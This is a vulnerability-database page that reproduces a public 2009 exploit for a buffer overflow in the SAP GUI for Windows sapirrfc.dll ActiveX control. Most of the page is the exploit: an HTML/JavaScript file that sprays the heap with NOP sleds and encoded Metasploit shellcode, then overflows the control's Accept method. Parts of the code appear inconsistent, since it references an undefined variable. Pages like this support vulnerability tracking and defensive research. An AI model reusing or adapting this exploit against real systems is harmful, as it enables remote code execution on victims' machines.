Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

SAP GUI for Windows sapirrfc.dll Activex Overflow Exploit

🗓️ 10 Dec 2009 00:00:00Reported by RootType 
seebug
 seebug🔗 www.seebug.org👁 16 Views

SAP GUI for Windows sapirrfc.dll Activex Overflow Exploi

Code

                                                <html>
<title> SAP GUI for Windows sapirrfc.dll (Accecpt) Activex Overflow </title>
<center> 
<h1> www.Abysssec.com Public Exploit <h1>
</center>
<object classid='clsid:77F12F8A-F117-11D0-8CF1-00A0C91D9D87' id='target' />
<script>
/*
Application:                    SAP GUI for Windows,  EnjoySAP
Versions Affected:              Version 6.4 
Vendor URL:                     http://SAP.com
Bugs:                           Buffer Overflow
Exploits:                       YES
Reported:                       13.11.2008
Vendor response:                17.11.2008
Date of Public Advisory:        08.06.2009
CVE-number:                     
Discovery :                         Alexander Polyakov
				Digital Security Research Group [DSecRG] (research [at] dsec [dot] ru)

Exploit : www.Abysssec.com 

Note : it's really simple exploit i wrote a few month ago ... no point to keep it private .... 

For more Information visit www.abysssec.com

Mail : [email protected]

=========================================================================================================
References:
***********
SAP note 1286637

https://service.sap.com/sap/support/notes/1286637
==========================================================================================================


*/
function spary() {

// win32_exec -  EXITFUNC=seh CMD=c:\windows\system32\calc.exe Size=378 Encoder=Alpha2 http://metasploit.com 
var shellcode = unescape("%u03eb%ueb59%ue805%ufff8%uffff%u4949%u4949%u4949" +
                          "%u4948%u4949%u4949%u4949%u4949%u4949%u5a51%u436a" +
                          "%u3058%u3142%u4250%u6b41%u4142%u4253%u4232%u3241" +
                          "%u4141%u4130%u5841%u3850%u4242%u4875%u6b69%u4d4c" +
                          "%u6338%u7574%u3350%u6730%u4c70%u734b%u5775%u6e4c" +
                          "%u636b%u454c%u6355%u3348%u5831%u6c6f%u704b%u774f" +
                          "%u6e68%u736b%u716f%u6530%u6a51%u724b%u4e69%u366b" +
                          "%u4e54%u456b%u4a51%u464e%u6b51%u4f70%u4c69%u6e6c" +
                          "%u5964%u7350%u5344%u5837%u7a41%u546a%u334d%u7831" +
                          "%u4842%u7a6b%u7754%u524b%u6674%u3444%u6244%u5955" +
                          "%u6e75%u416b%u364f%u4544%u6a51%u534b%u4c56%u464b" +
                          "%u726c%u4c6b%u534b%u376f%u636c%u6a31%u4e4b%u756b" +
                          "%u6c4c%u544b%u4841%u4d6b%u5159%u514c%u3434%u4a44" +
                          "%u3063%u6f31%u6230%u4e44%u716b%u5450%u4b70%u6b35" +
                          "%u5070%u4678%u6c6c%u634b%u4470%u4c4c%u444b%u3530" +
                          "%u6e4c%u6c4d%u614b%u5578%u6a58%u644b%u4e49%u6b6b" +
                          "%u6c30%u5770%u5770%u4770%u4c70%u704b%u4768%u714c" +
                          "%u444f%u6b71%u3346%u6650%u4f36%u4c79%u6e38%u4f63" +
                          "%u7130%u306b%u4150%u5878%u6c70%u534a%u5134%u334f" +
                          "%u4e58%u3978%u6d6e%u465a%u616e%u4b47%u694f%u6377" +
                          "%u4553%u336a%u726c%u3057%u5069%u626e%u7044%u736f" +
                          "%u4147%u4163%u504c%u4273%u3159%u5063%u6574%u7035" +
                          "%u546d%u6573%u3362%u306c%u4163%u7071%u536c%u6653" +
                          "%u314e%u7475%u7038%u7765%u4370");

//Declares bigblock with 90909090
var bigblock = unescape("%u9090%u9090");
// The IE uses 0x20 headersize
var headersize = 20;
//20 + length of shellcode
var slackspace = headersize + shellcode1.length;
// While (length of what is copying from bigblock, ie 90909090 less than 20 + along the shellcode, increase 90909090 )
while (bigblock.length < slackspace) bigblock += bigblock;
// Top of the fillblock = 90909090, and all but what is the slackspace.
var fillblock = bigblock.substring(0,slackspace);
// Block = Since the early 9090 ... and all but (the length of the 9090 ...least slackspace)
var block = bigblock.substring(0,bigblock.length - slackspace);
// While (length + slackspace block is less than 0x40000) block is equal to the aggregate in the block + block + Fillblock
while (block.length + slackspace < 0x40000) block = block + block + fillblock;

// Simple, created in the memory block + shellcode 1000.
var memory = new Array();
for (i = 0; i < 1000; i++){ memory[i] = block + shellcode }

// Execute vulnerable  function and copy buffer + shellcode and +  spary the heap to execute our values
var buffer = ""
for (i = 0; i < 40000; i++) { buffer = buffer + unescape("%0D") }
target.Accept buffer
spary();
</script>
</html>

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
10 Dec 2009 00:00Current
7.1High risk
Vulners AI Score7.1
sap guiwindowssapirrfc.dllactivex overflowexploitabysssec.combuffer overflowsap note 1286637digital security research group
16